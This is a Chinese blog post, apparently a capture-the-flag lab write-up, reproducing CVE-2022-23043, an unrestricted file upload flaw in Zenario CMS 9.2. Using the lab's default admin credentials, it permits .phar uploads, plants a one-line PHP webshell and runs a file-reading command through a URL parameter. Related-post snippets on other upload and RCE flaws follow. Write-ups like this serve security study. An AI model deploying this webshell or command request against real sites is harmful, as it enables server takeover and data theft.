文件上传漏洞(CVE-2022-23043)

已于 2024-06-19 23:12:47 修改
阅读量10w+ 收藏
点赞数 6
文章标签: 安全 web安全 php 网络安全
于 2023-11-21 01:20:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lkbzhj/article/details/134522218
版权

简介

CVE-2022-23043是一个与Zenario CMS 9.2文件上传漏洞相关的安全漏洞。该漏洞被定义为文件的不加限制上传,攻击者可以利用这个漏洞上传webshell以执行任意命令。利用这个漏洞的攻击者暂无特定情况。要利用此漏洞,攻击者首先需要访问Zenario CMS的管理后台并通过使用弱口令“admin/adminqwe12”进行登录。

攻击过程

1.打开靶场,扫描靶场发现路径admin.php,发现登陆页面,使用上述账号密码登录

2.登陆进去之后修改配置

修改完成之后,点击最底部check again,然后点击continue

3.进入首页,左上角依次点击按钮:【Go to Organizer】-【Configuration】-【File/MIME Types】

创建一个新的可执行文件,并保存。

4.按照图中位置点击:【Documents】-【Upload documents】-【Public】选择公开

创建一个testshell.phar文件,文件内容为

<?php system($_GET[1]); phpinfo();?>

执行此文件,并上传

4.选中上传的文件,依次点击:【Actions】-【View public link】

5.复制此链接进行访问

6.使用命令请求flag

http://39.106.48.123:18787/public/downloads/p7SPu/testshell.phar?1=cat%20../../../../../../../flag

得到flag。

BTY@BTY
关注
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268)
qq_51577576的博客
03-13 1038
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268) 在ImageMagick 7.1.0-51版本及以前存在CVE-2022-44268漏洞。 ImageMagick 7.1.0-49 容易受到信息泄露的攻击。当它解析PNG图像(例如,调整大小)时,生成的图像可能嵌入了任意远程文件的内容(如果ImageMagick二进制文件有权读取它)。
ShowDoc远程下载导致文件上传漏洞复现 CVE-2021-36440&CVE-2022-1034
afei001
08-07 1053
ShowDoc v2.9.5中,不受限制的文件上传允许远程攻击者通过组件AdminUpdateController.class.php中的'file_url'参数执行任意代码。
CVE-2022-23043
qq_42036164的博客
01-13 397
7.保存后找到上传文件的位置,上传后缀为phar的shell文件。并获取到文件地址,连接蚁剑获取flag。
[春秋云镜]CVE-2022-23043
niubi707的博客
12-04 5850
CVE-2022-23043Zenario CMS 9.2 文件上传漏洞,攻击者可上传webshell执行任意命令。登陆信息:admin/adminqwe12
Zenario CMS 9.2 文件上传漏洞CVE-2022-23043
Flag少侠的博客
07-26 9527
打开靶场进入靶场爆破扫描目录发现有一个 admin.php访问发现是登录页面首先得改属性,因为这里设置了不提交表单(翻译中间红色可得到)题目给出账号密码:admin/adminqwe12看到目录不存在,先手动更改点击管理图片先修改配置科普一下:“.phar” 文件是一种 PHP 档案文件,类似于压缩文件,但可以包含 PHP 代码text/plain是一种 MIME 类型,表示纯文本文件添加新设置(注意:保存时选择第一个)上传文件查看一下链接复制链接使用蚁剑连接成功。
春秋云境:CVE-2022-23043
一只爱吃橙子的羊
12-13 1058
Zenario CMS 9.2 文件上传漏洞,攻击者可上传webshell执行任意命令。登陆信息:admin/adminqwe12
春秋云镜 CVE-2022-23043
qq_22002773的博客
07-14 213
春秋云镜 CVE-2022-23043
CVE-2022-29464 WSO2文件上传漏洞
weixin_45260839的博客
07-23 4329
CVE-2022-29464 WSO2文件上传漏洞
Atlassian Confluence CVE-2022-26134 RCE漏洞
sxr__nc的博客
04-22 1109
漏洞环境搭建前期主要搭建动态调试环境,但是一直失败(这里主要记录下动态调试环境搭建过程,待之后再碰到类似的问题,希望能够解决)通常称为服务端小程序,是服务端的程序,用于处理及响应客户的请求。之后即可直接调试(这次是成功了的,可以正常动态调试,反思和之前不一样的操作就是在弹出。直接对比补丁包的修改,入手点参考网上已有的分析报告.主要参考链接在文末给出.填入密钥,因为我这里已经注册过了,所以直接填入密钥,没注册过,可以点击。的环境基本上已经搭建完毕了,接下来进行网站设置,我选择的是。(直接进行动态调试)
ShowDoc远程下载导致文件上传漏洞分析 CVE-2021-36440&CVE-2022-1034
afei001
08-06 1058
根据Pd1r提交的漏洞POC。可以知道漏洞触发点在:server/Application/Api/Controller/AdminUpdateController.class.php Burp构造数据包
Zenario:基于Web的内容管理系统-开源
04-13
Zenario是基于Web的内容管理系统。 它可以用于具有许多“所见即所得”功能的简单站点,但实际上是为运行Extranet站点(例如客户门户)而设计的。 它还具有从核心内置的多语言功能。
春秋云境系列靶场记录(合集)-不再更新
一只爱吃橙子的羊
11-29 7366
春秋云境系列靶场记录合集,不更新了哈……
春秋云境CVE-2022-23043
2303_76653367的博客
05-21 450
Zenario CMS 9.2 文件上传漏洞,攻击者可上传webshell执行任意命令。登陆信息:admin/adminqwe12。
[春秋云镜]CVE-2022-23134
niubi707的博客
11-29 1592
[春秋云镜]CVE-2022-23134靶场
1-PHP代码审计——PHPCMSV9.2上传文件漏洞
网络安全
03-30 933
漏洞复现环境: chrome浏览器安装xdebug phpstrom开发工具 wamp php-5.4.45 phpcms9.2 测试环境网址为www.test.com,环境搭建好后,在浏览器地址栏输入网址http://www.test.com/install安装phpcms9.2 默认都是下一步安装,到账号设置这一步需要设置数据库和cms管理后台的账户,根据自己本地环境设置就好。然后下一步,等待安装完成。 漏洞复现 访问首页注册一个用户: 注册...
禅道CMS文件上传漏洞(CNVD-C-2020-121325)
热门推荐
chaojixiaojingang
10-30 1万+
1.影响版本 <=12.4.2 2.漏洞描述 禅道CMS<=12.4.2版本存在文件上传漏洞,该漏洞由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本文件,造成任意代码执行,获取webshell。 3.漏洞POC 1)http://[目标地址]/www/client-download-[$version参数]-[base64加密后的恶意文件地址].html 2)http:// [目标地址] /www/index.php?m=clie...
网络安全概述:从认知到实践
最新发布
l1x1n0的博客
10-04 935
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 943
信息安全工程师——机房安全分析与防护篇
WSO2 文件上传CVE-2022-29464)漏洞复现
09-24
WSO2 文件上传 (CVE-2022-29464) 漏洞是一种针对Web服务组件WSO2 Identity Server的安全问题。该漏洞源于身份服务器中的文件上传功能存在未经验证的处理,攻击者可以利用它上传恶意脚本或文件,进而可能导致远程代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值